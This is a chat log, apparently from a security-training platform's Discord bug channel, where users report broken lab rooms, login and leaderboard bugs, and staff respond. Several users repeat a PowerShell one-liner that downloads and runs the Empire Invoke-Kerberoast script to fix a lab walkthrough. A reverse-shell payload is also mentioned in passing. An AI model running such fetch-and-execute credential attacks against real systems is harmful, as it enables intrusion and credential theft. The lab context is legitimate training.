Try using email rather than username @clever cloud

ok

that worked.. guess I'm trolling

thanks

@clever cloud nah, username login doesn't work for me either

@frosty cape did you find a fix for that?

Going to restart OpenVPN server in 10 mins

Just uploading some code to improve the platform. Don't want it crashing again

VPN stopped giving me issues after a while

Might have been from the traffic peak?

Yeah, people are still using GoBuster

And all those requests are being routed throuh the VPN server

Will fragment at some point

@frosty cape I was mainly referring to the login issue. You can't log in with your username but the prompt is username/email.

Couple of people, myself included, have found that

Is the restart currently happenin'?

Yeet

Pushed

Hopefully that will stop the crash.. I'm going to eat my words I just know it

Thanks, been fixed

Also, people who make rooms can't view them if they're sub only. They can manage but not view

oh yeah, thats actually a very good point

Thats providing they dont have a sub tho right?

@frosty cape yea

Thanks, added to my list 🙂

In room https://tryhackme.com/room/xss , it says You do not need to be connected to our network to deploy and access this. but I get given a 10.10.x.x IP

why does every room link redirect to the why subscribe link?

Because it's a sub only room?

https://tryhackme.com/room/bpnetworking Test

i guess that why, but you can make me like it! 😡

@frosty cape The password hash is impossible, shadow file isn't readable by this user and you don't have sudo

aha

you can do this 😉

ref to supporting material 😉

@sly raft Neither file is readable

DM pls 🙂

Advent of Cyber, Task 9/Day 4, Item #5 - seems broken; running the same command results in diff #s of files on different people's systems

Sorry about that

Tomorrow, you're all going to ❤️ the challenge I have planned

yay

Thanks for the fix ❤️

😄 ❤️

@sly raft fun fact, leading zeroes in an IP address octet leads to undefined behaviour. Windows treats it as Octal and things go vey wrong.

I mean undefined behaviour also means it could go right ;)

Hi, I have some weird behavior with day 4 challenge. I can see the questions while logged out, but can't see them anymore once logged in. I have tried to disable adblocker, change my browser, I even tried with another computer, but still the exact same problem :/

@haughty sand try to leave the room and re-join

@slender pagoda it worked, thanks!

Can I get an admin or someone who has access to check how the "answer" function works on the site, @celest summit found an interesting bug

It appears, at least on one question in todays room, but perhaps all questions, if you submit the right answer, the answer will accept even if anything incorrect is following the right answer in the answer box. Example: if 1.1.1.1 is the answer, you can submit 1.1.1.1.5.3.5.1.2 and the answer will submit successfully.

This is true of at least 9-4 in the advent room

AFAIK the answers all (or most) have some regex for matching, and especially that one might be because they "fixed" the answer as there was some weird results showing up

There's a fair amount of regex involved in the answer submission, hence why the answers can be overly forgiving at times

We use a similarity metric to check answers so the text you enter must be 80% similar to the answer

And I think this is done by comparing characters

^ Yeah, its not quite perfected though as you can see.

@frosty cape on the 'Teams' leaderboard page, captain is spelt wrong.

Fixed! Will be live in the next push! 😄

Thank you

For the room kenobi, the mount command no longer works

Hello task 9 has no questions and it indicates that I have completed it. How can I fix it? (cyber advent)

Leave and rejoin the room

Answer to Alfred q1 is wrong

Nmap with all ports shows 1 more than the answer stated

Investigating Windows is unbearably slow, probably needs more resources as it's a gui

Definitely needs more RAM

Things like event viewer take a long time to load which makes completing any tasks a real chore

Also the answer that was there for Hackback (2?) on that room doesn't work. Room is the same and the logs are the same

Answer format was wrong

Also yeah, too little ram to even open notepad in under a minute

Hm, I've noticed the boot time on the VMs have gotten worse since December

After a spur of machine deploys

I will investigate 🙂

@spiral flame The answer are not the same, its a different VM

Was just simulated the same

It's exactly the same

Same timestamps

Same answers

Ah must have attached the same questions

Also

In terms of the boot times on AWS

I need to request higher resouce rate

So hopefully it will improve soonish

Yeah we're being limited - I have requested our quota to be increased.

its confusing

4 available pages and shows 6

Confirmed bug, I have the same issue with 12 pages. I think it rounds to the next multiple of 6.

i guess its a counting problem related to filter buttons

when you filter it shows less available pages

but not fixing the scroll

Even without filtering, I get the extra pages

@deft jackal It disables the extra pages

You wont be able to click 5 and 6

@frosty cape just a suggestion for better UI remove them from the scroll better than disable them, it is confusing control

Hmm, Yeah very true

Ill do that now as its just removing extra code

@rugged ermine is the bot meant to say welcome ‘special_quote’ or is it meant to be replaced with an actual quote when someone joins?

That's a rare event, it'll typically do a normal quote. Likely that cog is malfunctioning

Ah ok, I knew they were rare but wasn’t sure if special_quotr was just a variable that hadn’t updated

The quote thing has no issue, we just can't figure out why is there so many invalid-user
But yeah no special_quote is intended

special_quote is all we could come up with for a special quote

"bLuE iS nOt BrOkEn. -DarkStar, probably."

And this

I added another one but apparently it got stashed, I'll readd

And the highest confidence level one isn't correct (or at least for me)

Christmas challenge for today, Q2 has quite a few OSs with the same confidence level 🙂

And the highest confidence level one isn't correct (or at least for me)

Yes, port scanning over the internet isn't very reliable

I get different numbers of ports, or incredibly slow (read: hours) for a scan

There's a mistake in the official room Corp

Flag needs a space, but flag in the file doesn't have one

Also, the command is wrong because it specifies the name of an AD forest that doesn't exist

You need to change the name of the forest, AND also respace the command it gives you

it doesn't tell you enough about the box to enumerate it correctly, especially since this is a walkthrough

iex​(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') is also broken

iex​(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')

iex​(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') is the correct

Also password has expired so you have to manually type out a ludicrously long password and reset it

I expected more from an official room.

@spiral flame yeah, I pinged @frosty cape a few times within the past week on the Corp room on those issues and didn't hear back

i also use the Feedback link on the site for a lot of stuff like that but never hear back if any of it gets fixed. So no clue if it's doing any good to report

Hi @tidal kiln what's your username? I don't recall getting anything from you :(

I always try to answer all feedback or put the bugs on my to do list

Also @spiral flame hmm, I'll look into this - we had that rooms VM built by a community member. So will ask them to fix the password issue and I'll have the VM reuploaded.

weird thing i finished this room and i dont see my self listed here

Assuming you've done a hard refresh of the page?

same, i joined like 6 rooms and my name not showing ini any

Hmm weird, what's your THM username and what room(s) is this an issue in?

sec

I think you'll only show in the leaderboard/chart if you're in the top 50 ranking for the room as well

https://tryhackme.com/room/crackthehash

https://tryhackme.com/p/CyberEagle

Yeah, it's probably a case of not being in the top 50 - If I can remember/find the api request to pull the full leaderboard I'll check to confirm

hmm i see

i suggest to be increased to 100

at least

lol

dont you think ?

50 seems reasonable to me

Even with 50 the chart is messy, dread to think what it would look like with double the number of results lol

If you're that low you probably with end up in the grey mess anyways

Yeah, the chart is limited to 50 users so @deft jackal you wont see yourself sorry

I was thinking of changing the line graph to a bar chart

So you see users scores more accurately.

Alternatively maybe there could be an api call where a user's own score will always appear on the room leader board with the rank for the room

Room Ice Task 4 # 10 doesn't seem to display any more options after setting the session.

Only after running the exploit command did a payload (windows/meterpreter/reverse_tcp) automatically select itself and more options showed up

Weird I swear it worked when I was doing it the other day

ditto, just did the same room and can confirm exact same finding as @fervent gust

@tropic ore dm me if you need any help

All thm.link links are currently broken.

https://thm.link/25daysofchristmas

Hjmm

Looking into that now

Not really a bug but I believe there is a typo in #rules

"strictly prohibited, just don't turn it into advertising."

Is anyone else having trouble after connecting to FTP on task 16 of the christmass event? I can login just fine and execute the help command. When I try to list the directory using dir or ls however the server disconnects

switching to passive mode made no difference

When I enable debug mode it seems like something is not set up correctly:

ftp: setsockopt (ignored): Permission denied

---> PORT 10,8,13,251,189,243

@frosty cape You mentioned that this past sunday you were going to remove the feature regarding "Also is there any way to leave a room that is for members only? If I click the room, it just immediately takes me to /why-subscribe". Just wanted to check in since it still won't allow me to leave a room that requires a subscription. The room in this case was Game Zone; Code: gamezone

It seems that the progress section is bugged on the paths. I'm currently doing primer and the values are different

versus this

Ooooooo ok

That is really really weird

I've put this high on my to-do list

@ocean reef I will remove this in the next push - advent of cyber has been keeping me from regularly building and pushing code.

@frosty cape okay 🙂 thank you for looking into it!

Thank you for reporting it

How are you finding the pathways?

quite interesting to be fair! also, there's this section of the wiki that could be integrated in the paths https://tryhackme.com/goals

rather than having that info in 2 places as it is closely related, and probably leave the paths free to access but point out which rooms you require subscription for

I couldn't bring myself to get rid of the goals page

Because I like how you can get a good overview of all rooms

Jeesssuus, that goals page needs updating

We have so many new rooms added since then

i understand that, but i think it can be integrated as part of the learning paths

Wouldn't it be repeated though?

like it is now but in brackets (subscribers only)

well you will have the room, the description and the outcome

because the rooms are layed out in the pathways

so you won't require the goals page

Yeah true hm

Like a "summary" list of all rooms in a pathway with a tick or not

it's up to you, i just find it a little bit redundant, you could do the tick on normal paths too probably?

Yeah thats true

like let's say you got the path> expand> you get rooms>expand> you get the outcomes

and that to be accessible to everyone but the premium rooms to be pointed out

i don't know if it makes sense to you what I'm saying

No worries @frosty cape and thanks for all the hard work. Loving the advent calendar and finally getting into some additional rooms of THM

why cant i edit my email as i misspelled it

?

??

You can!

Email support

how

hello@tryhackme.com

should i send the email

?

stating i misspelled my email

??

yes

i sent it there

it would have been better if we could do it for ourselves

how long will it take for my email to be corrected

??

@vocal raptor

@trim relic I will do it now if you email

i already did

Out of interested, why do you need it asap?

can you please check

i would like to get verified and like to explore and learn

lets see if i can subscribe aswell

@trim relic I wouldn't post your contact details on a public discord like this 🙂

Your email has been updated

thank you @frosty cape

🙂

please delete it

@mortal root Yeah good shout

please delete and guys dont brute force me

😦

😦

😦

https://tenor.com/view/hackintothemainframe-hack-into-the-mainframe-gif-12192418

why dont i get the verification email

🙂

@rare swallow Path bug has been fixed, can you please please verify?

@frosty cape On the goals page, basicpentesting has been made private

@frosty cape confirmed. Works fine! 👍🏼

Amazing, what % is it showing out of interest

57

On both

Wait a moment

@frosty cape that's not right. I got 3 boxes left on this path

How did it drop from 73 to 57

So it does it depending on how many tasks are left

Are the last 3 boxes onthe path have many tasks?

Let me look into it again

I can't check right now, sorry. It's the blue primer part and ice

OKay I will check again 🙂

Ah actualyl dude yeah then its accurate

Blue primer is a large part

@rugged ermine

That must have glitched on an edit, gimme just a sec

@rare swallow thanks much for the heads up on that

Check it now, I fixed it

Looks like another question got squished into it a bit

okay

looks good for now

i just started hating on Splunk

jesus

Splunk is a very powerful tool but the learning curve is immense

@rugged ermine more of a suggestion for this:

you should either word it a little bit better or give a hint out that it's similar to a function in excel

took me ages to understand what it's asked

from the context it points out to 'rename'

Hey everyone

I m amant from India

Hi! Wrong channel btw hop on to #521382216304033794 or maybe #thm-community-media

I assume this is your work @frosty cape ? Room - learnburp

Think so?

has some slight grammar mistakes

well text, my bad

and deploy on both task 2 and 3, even though it's the same machine?

Thanks for reporting, I removed deploy from both tasks

And removed that a;sp

Will read the room fully tonight and update accordingly.

thank you :), also, is there any chance we can get an updated version of it

Updated version of what sorry?

The room is updated (refresh the learnburp page)

i mean a more thorough room that covers a little bit more of the functionality of burp suite. as i am just learning about it now it seems pretty basic. I think a room that covers on how to use it and perform certain tasks to capture some flags will be more beneficial for the users

Yeah, I really need to add more tasks.

I want to focus on the content development, we have the community creating rooms which is amazing.

But soon I will shift my focus on seeking out great content developers to help us.

okay, that makes sense. Then, you should shift the ownership of the rooms to someone else in this process. or are you going to add sections on the rooms like: createdby - ; updated by - maintained by- ?

❤️

trapped forever

say a prayer for @glass kindle ✝️ 🙏 🤠

Lmao. I actually wouldn't mind I don't like the green name ¯_(ツ)_/¯

@glass kindle Ah, this is weird